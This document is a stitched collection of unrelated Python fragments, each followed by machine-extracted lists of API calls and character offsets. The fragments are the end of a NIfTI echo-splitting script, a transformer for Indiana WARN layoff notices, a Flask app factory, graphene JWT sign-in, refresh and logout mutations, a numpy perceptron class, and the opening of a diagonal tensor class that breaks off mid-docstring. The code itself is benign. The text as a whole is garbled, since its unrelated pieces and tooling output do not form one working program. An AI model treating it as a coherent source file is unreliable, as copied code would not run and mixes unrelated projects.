print(' Finished.')
|
[
"nibabel.Nifti1Image",
"os.makedirs",
"nibabel.load",
"os.path.basename",
"numpy.asanyarray",
"os.path.exists",
"numpy.squeeze",
"os.path.join"
] |
[((928, 950), 'os.path.exists', 'os.path.exists', (['OUTDIR'], {}), '(OUTDIR)\n', (942, 950), False, 'import os\n'), ((956, 975), 'os.makedirs', 'os.makedirs', (['OUTDIR'], {}), '(OUTDIR)\n', (967, 975), False, 'import os\n'), ((1115, 1132), 'nibabel.load', 'nb.load', (['nii_name'], {}), '(nii_name)\n', (1122, 1132), True, 'import nibabel as nb\n'), ((1290, 1316), 'os.path.basename', 'os.path.basename', (['basename'], {}), '(basename)\n', (1306, 1316), False, 'import os\n'), ((1332, 1362), 'os.path.join', 'os.path.join', (['OUTDIR', 'basename'], {}), '(OUTDIR, basename)\n', (1344, 1362), False, 'import os\n'), ((1155, 1181), 'numpy.asanyarray', 'np.asanyarray', (['nii.dataobj'], {}), '(nii.dataobj)\n', (1168, 1181), True, 'import numpy as np\n'), ((1414, 1438), 'numpy.squeeze', 'np.squeeze', (['temp[..., j]'], {}), '(temp[..., j])\n', (1424, 1438), True, 'import numpy as np\n'), ((1453, 1511), 'nibabel.Nifti1Image', 'nb.Nifti1Image', (['echo'], {'affine': 'nii.affine', 'header': 'nii.header'}), '(echo, affine=nii.affine, header=nii.header)\n', (1467, 1511), True, 'import nibabel as nb\n')]
|
import typing
from datetime import datetime
from ..schema import BaseTransformer
class Transformer(BaseTransformer):
"""Transform Indiana raw data for consolidation."""
postal_code = "IN"
fields = dict(
company="Company",
location="City",
notice_date="Notice Date",
effective_date="LO/CL Date",
jobs="Affected Workers",
)
date_format = ["%m/%d/%Y", "%m/%d/%y", "%B %Y", "%Y", "%b %Y", "%m/%Y"]
jobs_corrections = {
"97 (in MI)0 (in IN)": 0,
"100+": 100,
"62 MAY be affected": 62,
"5 in Indiana": 5,
"Unknown": None,
"75 in Indiana": 75,
"40-50": 40,
"100-130": 100,
"4 Hoosiers": 4,
"Undisclosed at this time": None,
"500 Nationwide": None,
"NA": None,
"103 (REVISED) 10/22/2020 108": 103,
}
date_corrections = {
"01/30/1202": datetime(2012, 1, 30),
"April/June 2020": datetime(2020, 4, 1),
"Unknown": None,
"Q1 2019": datetime(2019, 1, 1),
"Q1 2018": datetime(2018, 1, 1),
"Sept. 2016": datetime(2016, 9, 1),
"No closure date announced. Layoffs to commence 05/27/2015": datetime(
2015, 5, 27
),
"TBD": None,
"09/22/2014-12/07/2014": datetime(2014, 9, 22),
"08/18/2014-12/31/2014": datetime(2014, 8, 18),
"End of 2013": datetime(2013, 12, 31),
"Mid-Year 2014": datetime(2014, 6, 15),
"02/29/2013": datetime(2013, 2, 28),
"year end 2014": datetime(2014, 12, 31),
"4th Qtr 2012": datetime(2012, 9, 1),
"Mid February 2012": datetime(2012, 2, 14),
"3rd Qtr 2012": datetime(2012, 6, 1),
"LO-01/14/2011 CL-End of 2012": datetime(2011, 1, 14),
"Prior to the end of 2009 (as stated in the WARN notice)": datetime(
2009, 12, 31
),
"No closure date announced. Layoffs": None,
"1st Quarter 2009": datetime(2009, 1, 1),
"02/02/2009\xa0to\xa0\xa012/30/2009": datetime(2009, 2, 2),
"3rd Quarter of 2009": datetime(2009, 6, 1),
"August to December 2008": datetime(2008, 8, 1),
"10/37/2008": datetime(2008, 10, 27),
"2/29/2013": datetime(2013, 2, 28),
"LO-1/14/2011 CL-End of 2012": datetime(2011, 1, 14),
"3rd quarter of 2009": datetime(2009, 6, 1),
}
def prep_row_list(
self, row_list: typing.List[typing.Dict]
) -> typing.List[typing.Dict]:
"""Make necessary transformations to the raw row list prior to transformation.
Args:
row_list (list): A list of raw rows of data from the source.
Returns: The row list minus empty records
"""
# Do the standard stuff
row_list = super().prep_row_list(row_list)
# Cut rows with data-free revisions
return [r for r in row_list if r["Affected Workers"] != "N/A"]
def transform_date(self, value: str) -> typing.Optional[str]:
"""Transform a raw date string into a date object.
Args:
value (str): The raw date string provided by the source
Returns: A date object ready for consolidation. Or, if the date string is invalid, a None.
"""
# Try corrections before we edit the string
try:
dt = self.date_corrections[value]
if dt:
return str(dt.date())
else:
assert dt is None
return dt
except KeyError:
pass
# A little custom clean up based on the weird stuff from this source
value = value.replace("starting", "")
value = value.strip().split(" and ")[0].strip()
value = value.strip().split(" to ")[0].strip()
value = value.strip().split(" through ")[0].strip()
value = value.strip().split(" - ")[0].strip()
value = value.strip().split(" & ")[0].strip()
value = value.strip().split("\xa0to ")[0].strip()
value = value.strip().split(" – ")[0].strip()
value = value.strip().split("-")[0].strip()
# The same old stuff
return super().transform_date(value)
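    # Worked example (illustrative): transform_date("09/22/2014-12/07/2014") hits
    # the date_corrections table above and returns "2014-09-22".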
def check_if_closure(self, row: typing.Dict) -> typing.Optional[bool]:
"""Determine whether a row is a closure or not.
Args:
row (dict): The raw row of data.
Returns: A boolean or null
"""
whitelist = ["CL", "CL -Relocating", "LO and CL", "LO/CL", "PENDING CL"]
return row["Notice Type"] in whitelist or None
|
[
"datetime.datetime"
] |
[((915, 936), 'datetime.datetime', 'datetime', (['(2012)', '(1)', '(30)'], {}), '(2012, 1, 30)\n', (923, 936), False, 'from datetime import datetime\n'), ((965, 985), 'datetime.datetime', 'datetime', (['(2020)', '(4)', '(1)'], {}), '(2020, 4, 1)\n', (973, 985), False, 'from datetime import datetime\n'), ((1031, 1051), 'datetime.datetime', 'datetime', (['(2019)', '(1)', '(1)'], {}), '(2019, 1, 1)\n', (1039, 1051), False, 'from datetime import datetime\n'), ((1072, 1092), 'datetime.datetime', 'datetime', (['(2018)', '(1)', '(1)'], {}), '(2018, 1, 1)\n', (1080, 1092), False, 'from datetime import datetime\n'), ((1116, 1136), 'datetime.datetime', 'datetime', (['(2016)', '(9)', '(1)'], {}), '(2016, 9, 1)\n', (1124, 1136), False, 'from datetime import datetime\n'), ((1207, 1228), 'datetime.datetime', 'datetime', (['(2015)', '(5)', '(27)'], {}), '(2015, 5, 27)\n', (1215, 1228), False, 'from datetime import datetime\n'), ((1306, 1327), 'datetime.datetime', 'datetime', (['(2014)', '(9)', '(22)'], {}), '(2014, 9, 22)\n', (1314, 1327), False, 'from datetime import datetime\n'), ((1362, 1383), 'datetime.datetime', 'datetime', (['(2014)', '(8)', '(18)'], {}), '(2014, 8, 18)\n', (1370, 1383), False, 'from datetime import datetime\n'), ((1408, 1430), 'datetime.datetime', 'datetime', (['(2013)', '(12)', '(31)'], {}), '(2013, 12, 31)\n', (1416, 1430), False, 'from datetime import datetime\n'), ((1457, 1478), 'datetime.datetime', 'datetime', (['(2014)', '(6)', '(15)'], {}), '(2014, 6, 15)\n', (1465, 1478), False, 'from datetime import datetime\n'), ((1502, 1523), 'datetime.datetime', 'datetime', (['(2013)', '(2)', '(28)'], {}), '(2013, 2, 28)\n', (1510, 1523), False, 'from datetime import datetime\n'), ((1550, 1572), 'datetime.datetime', 'datetime', (['(2014)', '(12)', '(31)'], {}), '(2014, 12, 31)\n', (1558, 1572), False, 'from datetime import datetime\n'), ((1598, 1618), 'datetime.datetime', 'datetime', (['(2012)', '(9)', '(1)'], {}), '(2012, 9, 1)\n', (1606, 1618), False, 'from datetime import datetime\n'), ((1649, 1670), 'datetime.datetime', 'datetime', (['(2012)', '(2)', '(14)'], {}), '(2012, 2, 14)\n', (1657, 1670), False, 'from datetime import datetime\n'), ((1696, 1716), 'datetime.datetime', 'datetime', (['(2012)', '(6)', '(1)'], {}), '(2012, 6, 1)\n', (1704, 1716), False, 'from datetime import datetime\n'), ((1758, 1779), 'datetime.datetime', 'datetime', (['(2011)', '(1)', '(14)'], {}), '(2011, 1, 14)\n', (1766, 1779), False, 'from datetime import datetime\n'), ((1848, 1870), 'datetime.datetime', 'datetime', (['(2009)', '(12)', '(31)'], {}), '(2009, 12, 31)\n', (1856, 1870), False, 'from datetime import datetime\n'), ((1974, 1994), 'datetime.datetime', 'datetime', (['(2009)', '(1)', '(1)'], {}), '(2009, 1, 1)\n', (1982, 1994), False, 'from datetime import datetime\n'), ((2042, 2062), 'datetime.datetime', 'datetime', (['(2009)', '(2)', '(2)'], {}), '(2009, 2, 2)\n', (2050, 2062), False, 'from datetime import datetime\n'), ((2095, 2115), 'datetime.datetime', 'datetime', (['(2009)', '(6)', '(1)'], {}), '(2009, 6, 1)\n', (2103, 2115), False, 'from datetime import datetime\n'), ((2152, 2172), 'datetime.datetime', 'datetime', (['(2008)', '(8)', '(1)'], {}), '(2008, 8, 1)\n', (2160, 2172), False, 'from datetime import datetime\n'), ((2196, 2218), 'datetime.datetime', 'datetime', (['(2008)', '(10)', '(27)'], {}), '(2008, 10, 27)\n', (2204, 2218), False, 'from datetime import datetime\n'), ((2241, 2262), 'datetime.datetime', 'datetime', (['(2013)', '(2)', '(28)'], {}), '(2013, 2, 28)\n', (2249, 2262), 
False, 'from datetime import datetime\n'), ((2303, 2324), 'datetime.datetime', 'datetime', (['(2011)', '(1)', '(14)'], {}), '(2011, 1, 14)\n', (2311, 2324), False, 'from datetime import datetime\n'), ((2357, 2377), 'datetime.datetime', 'datetime', (['(2009)', '(6)', '(1)'], {}), '(2009, 6, 1)\n', (2365, 2377), False, 'from datetime import datetime\n')]
|
from flask import Flask
def create_app():
app = Flask(__name__)
# register routes with app instead of current_app:
from app.main import bp as main_bp
app.register_blueprint(main_bp)
return app
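# Usage sketch (illustrative only):
#
#   app = create_app()
#   app.run(debug=True)   # or serve via a WSGI server in production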
|
[
"flask.Flask"
] |
[((54, 69), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (59, 69), False, 'from flask import Flask\n')]
|
from calendar import timegm
from django.contrib.auth import get_user_model
from django.contrib.auth.signals import user_logged_in, user_logged_out
from django.db import transaction
import graphene
from graphene.types.generic import GenericScalar
from graphene_django_jwt import signals
from graphene_django_jwt.blacklist import Blacklist
from graphene_django_jwt.decorators import login_required
from graphene_django_jwt.exceptions import JSONRefreshTokenExpired, JSONWebTokenExpired, PermissionDenied
from graphene_django_jwt.models import RefreshToken
from graphene_django_jwt.shortcuts import get_refresh_token, get_token
from graphene_django_jwt.utils import create_refresh_token, get_payload, jwt_encode, jwt_payload
UserModel = get_user_model()
class RevokeAllTokensMutation(graphene.Mutation):
revoked_tokens = graphene.List(graphene.NonNull(graphene.String), required=True)
@login_required
def mutate(self, info, **kwargs):
revoked_tokens = []
for rt in RefreshToken.objects.filter(user_id=info.context.user.id, revoked__isnull=True):
rt.revoke()
revoked_tokens.append(rt.get_token())
return RevokeAllTokensMutation(revoked_tokens=revoked_tokens)
class ObtainJSONWebTokenMutation(graphene.Mutation):
token = graphene.String(required=True)
refresh_token = graphene.String(required=True)
class Arguments:
username = graphene.String(required=True)
password = graphene.String(required=True)
def mutate(self, info, username, password):
user = UserModel.objects.filter(username=username).first()
if user is None:
raise PermissionDenied
if not user.is_active:
raise PermissionDenied
if not user.check_password(password):
raise PermissionDenied
refresh_token = create_refresh_token(user).get_token()
payload = jwt_payload(user, refresh_token=refresh_token)
token = jwt_encode(payload)
user_logged_in.send(sender=ObtainJSONWebTokenMutation, request=info.context, user=user)
return ObtainJSONWebTokenMutation(token=token, refresh_token=refresh_token)
class RefreshMutation(graphene.Mutation):
token = graphene.String(required=True)
payload = GenericScalar(required=True)
refresh_token = graphene.String(required=True)
class Arguments:
refresh_token = graphene.String(required=True)
def mutate(self, info, refresh_token):
refresh_token = get_refresh_token(refresh_token)
if refresh_token.revoked:
raise JSONRefreshTokenExpired
if refresh_token.is_expired():
raise JSONRefreshTokenExpired
refreshed_token = refresh_token.rotate()
payload = jwt_payload(refresh_token.user, refresh_token=refreshed_token.get_token())
token = jwt_encode(payload)
signals.refresh_finished.send(
sender=RefreshToken,
user=refresh_token.user,
request=info.context,
)
return RefreshMutation(token=token, payload=payload, refresh_token=refreshed_token.get_token())
class RevokeMutation(graphene.Mutation):
revoked = graphene.Int(required=True)
class Arguments:
refresh_token = graphene.String(required=True)
def mutate(self, info, refresh_token):
refresh_token = get_refresh_token(refresh_token)
refresh_token.revoke()
return RevokeMutation(revoked=timegm(refresh_token.revoked.timetuple()))
class VerifyMutation(graphene.Mutation):
payload = GenericScalar(required=True)
class Arguments:
token = graphene.String(required=True)
def mutate(self, info, token):
payload = get_payload(token)
if Blacklist.is_blacklisted(payload['refresh_token']):
raise JSONWebTokenExpired
return VerifyMutation(payload=payload)
class LogoutMutation(graphene.Mutation):
success = graphene.Boolean(required=True)
class Arguments:
refresh_token = graphene.String(required=False)
@login_required
def mutate(self, info, refresh_token=None, **kwargs):
if refresh_token:
refresh_token = get_refresh_token(refresh_token)
refresh_token.revoke()
user_logged_out.send(sender=self.__class__, request=info.context, user=info.context.user)
return LogoutMutation(success=True)
class SignUpMutation(graphene.Mutation):
token = graphene.String(required=True)
class Arguments:
password = graphene.String(required=True)
username = graphene.String(required=True)
@transaction.atomic
def mutate(self, info, username, password, **kwargs):
user = UserModel.objects.create_user(
username=username,
password=password,
)
refresh_token = create_refresh_token(user)
token = get_token(
user,
refresh_token=refresh_token.token,
)
user_logged_in.send(sender=user.__class__, request=info.context, user=user)
return SignUpMutation(token=token)
class Mutation(graphene.ObjectType):
jwt_sign_in = ObtainJSONWebTokenMutation.Field(required=True)
jwt_sign_up = SignUpMutation.Field(required=True)
jwt_refresh_token = RefreshMutation.Field(required=True)
jwt_revoke_token = RevokeMutation.Field(required=True)
jwt_verify_token = VerifyMutation.Field(required=True)
jwt_revoke_all_tokens = RevokeAllTokensMutation.Field(required=True)
jwt_logout = LogoutMutation.Field(required=True)
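# Wiring sketch (illustrative only): mounting these mutations on a schema might
# look like the line below; `Query` is assumed to be defined elsewhere in the
# project and is not part of this file.
#
#   schema = graphene.Schema(query=Query, mutation=Mutation)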
|
[
"graphene.String",
"django.contrib.auth.signals.user_logged_out.send",
"graphene_django_jwt.shortcuts.get_token",
"graphene.NonNull",
"django.contrib.auth.get_user_model",
"graphene_django_jwt.models.RefreshToken.objects.filter",
"graphene_django_jwt.shortcuts.get_refresh_token",
"graphene_django_jwt.utils.jwt_payload",
"graphene.Boolean",
"graphene_django_jwt.utils.get_payload",
"django.contrib.auth.signals.user_logged_in.send",
"graphene.types.generic.GenericScalar",
"graphene_django_jwt.utils.create_refresh_token",
"graphene_django_jwt.signals.refresh_finished.send",
"graphene.Int",
"graphene_django_jwt.utils.jwt_encode",
"graphene_django_jwt.blacklist.Blacklist.is_blacklisted"
] |
[((738, 754), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (752, 754), False, 'from django.contrib.auth import get_user_model\n'), ((1289, 1319), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (1304, 1319), False, 'import graphene\n'), ((1340, 1370), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (1355, 1370), False, 'import graphene\n'), ((2218, 2248), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (2233, 2248), False, 'import graphene\n'), ((2263, 2291), 'graphene.types.generic.GenericScalar', 'GenericScalar', ([], {'required': '(True)'}), '(required=True)\n', (2276, 2291), False, 'from graphene.types.generic import GenericScalar\n'), ((2312, 2342), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (2327, 2342), False, 'import graphene\n'), ((3172, 3199), 'graphene.Int', 'graphene.Int', ([], {'required': '(True)'}), '(required=True)\n', (3184, 3199), False, 'import graphene\n'), ((3547, 3575), 'graphene.types.generic.GenericScalar', 'GenericScalar', ([], {'required': '(True)'}), '(required=True)\n', (3560, 3575), False, 'from graphene.types.generic import GenericScalar\n'), ((3924, 3955), 'graphene.Boolean', 'graphene.Boolean', ([], {'required': '(True)'}), '(required=True)\n', (3940, 3955), False, 'import graphene\n'), ((4433, 4463), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (4448, 4463), False, 'import graphene\n'), ((842, 875), 'graphene.NonNull', 'graphene.NonNull', (['graphene.String'], {}), '(graphene.String)\n', (858, 875), False, 'import graphene\n'), ((997, 1076), 'graphene_django_jwt.models.RefreshToken.objects.filter', 'RefreshToken.objects.filter', ([], {'user_id': 'info.context.user.id', 'revoked__isnull': '(True)'}), '(user_id=info.context.user.id, revoked__isnull=True)\n', (1024, 1076), False, 'from graphene_django_jwt.models import RefreshToken\n'), ((1412, 1442), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (1427, 1442), False, 'import graphene\n'), ((1462, 1492), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (1477, 1492), False, 'import graphene\n'), ((1899, 1945), 'graphene_django_jwt.utils.jwt_payload', 'jwt_payload', (['user'], {'refresh_token': 'refresh_token'}), '(user, refresh_token=refresh_token)\n', (1910, 1945), False, 'from graphene_django_jwt.utils import create_refresh_token, get_payload, jwt_encode, jwt_payload\n'), ((1962, 1981), 'graphene_django_jwt.utils.jwt_encode', 'jwt_encode', (['payload'], {}), '(payload)\n', (1972, 1981), False, 'from graphene_django_jwt.utils import create_refresh_token, get_payload, jwt_encode, jwt_payload\n'), ((1990, 2081), 'django.contrib.auth.signals.user_logged_in.send', 'user_logged_in.send', ([], {'sender': 'ObtainJSONWebTokenMutation', 'request': 'info.context', 'user': 'user'}), '(sender=ObtainJSONWebTokenMutation, request=info.context,\n user=user)\n', (2009, 2081), False, 'from django.contrib.auth.signals import user_logged_in, user_logged_out\n'), ((2389, 2419), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (2404, 2419), False, 'import graphene\n'), ((2488, 2520), 'graphene_django_jwt.shortcuts.get_refresh_token', 'get_refresh_token', (['refresh_token'], {}), '(refresh_token)\n', (2505, 2520), False, 'from graphene_django_jwt.shortcuts import 
get_refresh_token, get_token\n'), ((2838, 2857), 'graphene_django_jwt.utils.jwt_encode', 'jwt_encode', (['payload'], {}), '(payload)\n', (2848, 2857), False, 'from graphene_django_jwt.utils import create_refresh_token, get_payload, jwt_encode, jwt_payload\n'), ((2866, 2967), 'graphene_django_jwt.signals.refresh_finished.send', 'signals.refresh_finished.send', ([], {'sender': 'RefreshToken', 'user': 'refresh_token.user', 'request': 'info.context'}), '(sender=RefreshToken, user=refresh_token.user,\n request=info.context)\n', (2895, 2967), False, 'from graphene_django_jwt import signals\n'), ((3246, 3276), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (3261, 3276), False, 'import graphene\n'), ((3345, 3377), 'graphene_django_jwt.shortcuts.get_refresh_token', 'get_refresh_token', (['refresh_token'], {}), '(refresh_token)\n', (3362, 3377), False, 'from graphene_django_jwt.shortcuts import get_refresh_token, get_token\n'), ((3614, 3644), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (3629, 3644), False, 'import graphene\n'), ((3699, 3717), 'graphene_django_jwt.utils.get_payload', 'get_payload', (['token'], {}), '(token)\n', (3710, 3717), False, 'from graphene_django_jwt.utils import create_refresh_token, get_payload, jwt_encode, jwt_payload\n'), ((3729, 3779), 'graphene_django_jwt.blacklist.Blacklist.is_blacklisted', 'Blacklist.is_blacklisted', (["payload['refresh_token']"], {}), "(payload['refresh_token'])\n", (3753, 3779), False, 'from graphene_django_jwt.blacklist import Blacklist\n'), ((4002, 4033), 'graphene.String', 'graphene.String', ([], {'required': '(False)'}), '(required=False)\n', (4017, 4033), False, 'import graphene\n'), ((4243, 4337), 'django.contrib.auth.signals.user_logged_out.send', 'user_logged_out.send', ([], {'sender': 'self.__class__', 'request': 'info.context', 'user': 'info.context.user'}), '(sender=self.__class__, request=info.context, user=info\n .context.user)\n', (4263, 4337), False, 'from django.contrib.auth.signals import user_logged_in, user_logged_out\n'), ((4505, 4535), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (4520, 4535), False, 'import graphene\n'), ((4555, 4585), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (4570, 4585), False, 'import graphene\n'), ((4812, 4838), 'graphene_django_jwt.utils.create_refresh_token', 'create_refresh_token', (['user'], {}), '(user)\n', (4832, 4838), False, 'from graphene_django_jwt.utils import create_refresh_token, get_payload, jwt_encode, jwt_payload\n'), ((4855, 4905), 'graphene_django_jwt.shortcuts.get_token', 'get_token', (['user'], {'refresh_token': 'refresh_token.token'}), '(user, refresh_token=refresh_token.token)\n', (4864, 4905), False, 'from graphene_django_jwt.shortcuts import get_refresh_token, get_token\n'), ((4949, 5024), 'django.contrib.auth.signals.user_logged_in.send', 'user_logged_in.send', ([], {'sender': 'user.__class__', 'request': 'info.context', 'user': 'user'}), '(sender=user.__class__, request=info.context, user=user)\n', (4968, 5024), False, 'from django.contrib.auth.signals import user_logged_in, user_logged_out\n'), ((4167, 4199), 'graphene_django_jwt.shortcuts.get_refresh_token', 'get_refresh_token', (['refresh_token'], {}), '(refresh_token)\n', (4184, 4199), False, 'from graphene_django_jwt.shortcuts import get_refresh_token, get_token\n'), ((1842, 1868), 'graphene_django_jwt.utils.create_refresh_token', 
'create_refresh_token', (['user'], {}), '(user)\n', (1862, 1868), False, 'from graphene_django_jwt.utils import create_refresh_token, get_payload, jwt_encode, jwt_payload\n')]
|
import numpy as np
class layer():
def __init__(self,name,type,nodes_number):
self.name=name
self.type=type
self.nodes_number=nodes_number
self.input_values=np.zeros(shape=(nodes_number,1),dtype=float)##input values of nodes
self.sum_values=np.zeros(shape=(nodes_number,1),dtype=float)##sum values of nodes
self.output_values=np.zeros(shape=(nodes_number,1),dtype=float)##output values of nodes
def set_input_values(self,input):
self.input_values=input
if (self.type=="input"):
self.set_output_values(input)
def set_output_values(self,output):
self.output_values=output
class Model():
def __init__(self,method,input_type,perceptron_rule):
self.method=method##method
self.perceptron_rule=perceptron_rule
self.layers=[]##layers of Model
self.input_type=input_type
"""For Training """
self.Connections_Weight=[]## weight of Connections are stored
self.Connections_Bias=[]##Bias of Connections are stored
self.input_number=0##total input number for training model, using for iteration during epoch state
self.input_length=0##each input's length also output array length
self.input_arr=0##input array
self.output_arr=0##output array
self.output_length=0##output length
def add_layer(self,layer):
self.layers.append(layer)
def create_weight_and_bias_array(self,layer1,layer2,bias):
        ##create weight and bias arrays sized to match the node counts of the two connected layers
w_array=np.zeros(shape=(layer1.nodes_number,layer2.nodes_number),dtype=float)
self.Connections_Weight.append(w_array)##append to model weight list
b_array=np.full(shape=(layer2.nodes_number),fill_value=float(bias))
self.Connections_Bias.append(b_array)
def set_input_values(self,input_arr,input_number,input_length):
if(type(input_arr)!=np.ndarray):
raise Exception("Type Error: given input aren't ndarray")
input_layer=self.layers[0]
if not(input_length==input_layer.input_values.shape[0]):
raise Exception("input's length and nodes number of input layer aren't matched")
self.input_number=input_number
self.input_length=input_length
self.input_arr=input_arr
def set_output_values(self,output_arr,output_length):
if(type(output_arr)!=np.ndarray):
raise Exception("Type Error: given output aren't ndarray")
output_layer=self.layers[-1]
if not(output_length==output_layer.output_values.shape[0]):
raise Exception("output's length and nodes number of output layer aren't matched")
self.output_length=output_length
self.output_arr=output_arr
def activation_func(self,y_in,th):
y=1.0
if (-th < y_in < th):
y=0
elif (y_in<-th):
y=-1.0
return y
def activation_func_bin(self,y_in,th):
y=1.0
if (y_in < th):
y=0
return y
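    # Note (editorial): activation_func is a bipolar step: 1 for y_in >= th,
    # 0 inside the dead zone -th < y_in < th, and -1 for y_in < -th;
    # activation_func_bin is a plain binary step: 0 when y_in < th, else 1.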
def default_rule(self,input_arr,out,w_array,b_array,n,j):
for k,inp in enumerate(input_arr):##Update weights
w_array[k][j]=w_array[k][j]+n*out*inp
b_array[j]=b_array[j]+n*out##Update bias value
def delta_rule(self,input_arr,out,w_array,b_array,n,j,y):
for k,inp in enumerate(input_arr):##Update weights
w_array[k][j]=w_array[k][j]+n*(out-y)*inp
b_array[j]=b_array[j]+n*(out-y)##Update bias value
def Feed_Forward_Perceptron(self,input_arr,output_arr,n,th):
#bool=np.full((input_layer.nodes_number,output_layer.nodes_number),False)##boolean matrix for weight values
#while bool.all()!=True:##Until weights for each connections maintaing equation
w_array=self.Connections_Weight[0]
b_array=self.Connections_Bias[0]
y=0
for j,out in enumerate(output_arr):
y_in=0## sum
for i,inp in enumerate(input_arr):
y_in+=inp*w_array[i][j]
y_in+=b_array[j]##bias
if(self.input_type=="binary"):##activation
y=self.activation_func_bin(y_in,th)
elif(self.input_type=="bipolar"):
y=self.activation_func(y_in,th)
if(y!=out):
if self.perceptron_rule == "default":
self.default_rule(input_arr,out,w_array,b_array,n,j)
if self.perceptron_rule == "delta":
self.delta_rule(input_arr,out,w_array,b_array,n,j,y)
def Perceptron(self,learning_rate,epoch,threshold,bias):
iter=0
self.create_weight_and_bias_array(self.layers[0],self.layers[1],bias)#give input and output layer as arguments
acc=[]
while iter!=epoch:
for i in range(self.input_number):
self.Feed_Forward_Perceptron(self.input_arr[i],self.output_arr[i],learning_rate,threshold)
iter+=1
if(iter%1==0):
print("epoch="+str(iter))
accuracy=self.predict(self.input_arr,self.output_arr,map_prediction=False)
acc.append(accuracy)
return acc
#print("!!!Weights Matrix After Training!!!"+str(self.input_length)+"X"+str(self.output_length))
#print(self.Connections_Weight[0])
def train(self,learning_rate,epoch,bias,threshold):#return accuracy value of each epoch
if self.method=="perceptron":
acc=self.Perceptron(learning_rate,epoch,threshold,bias)
return acc
def predict_per_once(self,input,output):##predict a input
w_array=self.Connections_Weight[0]
b_array=self.Connections_Bias[0]
pred_result=np.zeros(shape=(self.output_length),dtype=np.float64)
for j,out in enumerate(output):
y_in=0.0
for i,inp in enumerate(input):
w=w_array[i][j]
y_in+=inp*w_array[i][j]
y_in+=b_array[j]
pred_result[j]=int(y_in)
return pred_result
def Map_Pred_Matrix(self,results):##listing predictions on matrix with pred value as x, real value as y
print("""!!!!!!!!Results Of Prediction Of Given Inputs!!!!!!!!""")
sep=" | "
Letters=["L","A","B","C","D","E","J","K"]
l=sep.join(map(str,Letters))
print("\t"+l)
for i,row in enumerate(results):
print("\t-----------------------------")
x=sep.join(map(str,row))
print("\t"+Letters[i+1]+" | "+x)
def predict(self,inputs,labels,map_prediction):##array that have more than one input as argument
true_result=0
false_result=0
results=[[0 for x in range(self.output_length)] for x in range(self.output_length)]
for i,input in enumerate(inputs):
pred_result=self.predict_per_once(input,labels[i])
pred_class=np.argmax(pred_result)##return index of max value as predicted class
real_class=np.where(labels[i]==1)[0][0]
results[pred_class][real_class]+=1
if pred_class==real_class:
true_result+=1
else:
false_result+=1
if(map_prediction==True):
self.Map_Pred_Matrix(results)
accuracy=float(true_result) / float(true_result+false_result)
print("accuracy=>"+str(accuracy))
return accuracy
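# --- Hedged usage sketch (editorial addition, not part of the original file) ---
# Shows the intended call sequence: build the two layers, register them on a
# Model, attach the data, train, then predict. The toy binary-AND data and the
# hyper-parameters below are illustrative assumptions only.
if __name__ == "__main__":
    toy_inputs = np.array([[1, 1], [1, 0], [0, 1], [0, 0]], dtype=float)
    toy_targets = np.array([[0, 1], [1, 0], [1, 0], [1, 0]], dtype=float)  # one-hot, column 1 = "AND is true"
    net = Model(method="perceptron", input_type="binary", perceptron_rule="default")
    net.add_layer(layer(name="in", type="input", nodes_number=2))
    net.add_layer(layer(name="out", type="output", nodes_number=2))
    net.set_input_values(toy_inputs, input_number=4, input_length=2)
    net.set_output_values(toy_targets, output_length=2)
    net.train(learning_rate=0.1, epoch=5, bias=0.0, threshold=0.5)
    net.predict(toy_inputs, toy_targets, map_prediction=False)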
|
[
"numpy.where",
"numpy.zeros",
"numpy.argmax"
] |
[((193, 239), 'numpy.zeros', 'np.zeros', ([], {'shape': '(nodes_number, 1)', 'dtype': 'float'}), '(shape=(nodes_number, 1), dtype=float)\n', (201, 239), True, 'import numpy as np\n'), ((285, 331), 'numpy.zeros', 'np.zeros', ([], {'shape': '(nodes_number, 1)', 'dtype': 'float'}), '(shape=(nodes_number, 1), dtype=float)\n', (293, 331), True, 'import numpy as np\n'), ((378, 424), 'numpy.zeros', 'np.zeros', ([], {'shape': '(nodes_number, 1)', 'dtype': 'float'}), '(shape=(nodes_number, 1), dtype=float)\n', (386, 424), True, 'import numpy as np\n'), ((1593, 1664), 'numpy.zeros', 'np.zeros', ([], {'shape': '(layer1.nodes_number, layer2.nodes_number)', 'dtype': 'float'}), '(shape=(layer1.nodes_number, layer2.nodes_number), dtype=float)\n', (1601, 1664), True, 'import numpy as np\n'), ((5735, 5787), 'numpy.zeros', 'np.zeros', ([], {'shape': 'self.output_length', 'dtype': 'np.float64'}), '(shape=self.output_length, dtype=np.float64)\n', (5743, 5787), True, 'import numpy as np\n'), ((6913, 6935), 'numpy.argmax', 'np.argmax', (['pred_result'], {}), '(pred_result)\n', (6922, 6935), True, 'import numpy as np\n'), ((7005, 7029), 'numpy.where', 'np.where', (['(labels[i] == 1)'], {}), '(labels[i] == 1)\n', (7013, 7029), True, 'import numpy as np\n')]
|
import CTL.funcs.xplib as xplib
from CTL.tensorbase.tensorbase import TensorBase
import CTL.funcs.funcs as funcs
# import numpy as np
from copy import deepcopy
from CTL.tensor.leg import Leg
from CTL.tensor.tensor import Tensor
import warnings
class DiagonalTensor(Tensor):
"""
The class for diagonal tensors, inheriting from Tensor
1. A data tensor as 1D-array: the elements on the main diagonal;
2. A set of legs, corresponding to each dimension of the tensor.
3. Other information(degree of freedom, total element number, ...)
Diagonal Tensors: a tensor with only non-zero elements on its main diagonal, e.g., for a 3-dimensional diagonal tensor A, only A_{iii} is non-zero, while A_{123} must be zero.
This class is also used for DiagonalTensorLike, an object that behaves almost the same as DiagonalTensor, but without data.
In the following docstrings we will take the number of elements as $n$, the dimension as $d$, and then make some statements on the time efficiency for some functions.
In other part of docstrings, we will not talk about Tensor and DiagonalTensor separately except for special cases.
Parameters
